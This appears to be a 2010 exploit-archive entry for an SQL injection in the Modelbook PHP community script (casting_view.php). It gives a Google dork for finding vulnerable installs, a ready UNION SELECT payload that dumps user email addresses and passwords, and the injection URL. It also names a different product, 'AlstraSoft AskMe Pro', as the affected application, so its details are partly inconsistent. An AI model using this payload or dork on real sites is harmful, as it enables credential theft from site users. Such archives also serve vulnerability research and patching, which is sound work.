Modelbook (casting_view.php) SQL Injection Vulnerability

2010-04-29T00:00:00
ID 1337DAY-ID-12049
Type zdt
Reporter v3n0m
Modified 2010-04-29T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ========================================================
Modelbook (casting_view.php) SQL Injection Vulnerability
========================================================

Author      : v3n0m
Site        : http://yogyacarderlink.web.id/
Date        : April, 29-2010
Location    : Jakarta, Indonesia
Time Zone   : GMT +7:00
----------------------------------------------------------------
 
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Application : AlstraSoft AskMe Pro
Vendor      : http://www.rocky.nu/
Price       : $100.00 USD
Google Dork : allinurl:casting_view.php?adnum=
Overview    :
 
Modelbook is a full featured web community script. A very extensive and
powerful web application written in PHP. 100% Open Source Code, no Encryption.
----------------------------------------------------------------
 
Exploit:
~~~~~~~
 
-9999+union+all+select+1,group_concat(email,char(58),pass)v3n0m,3,4,5,6,7,8,9,10+from+users--
 
 
SQLi p0c:
~~~~~~~
 
http://127.0.0.1/[path]/casting_view.php?adnum=[SQLi]
 
----------------------------------------------------------------



#  0day.today [2018-04-08]  #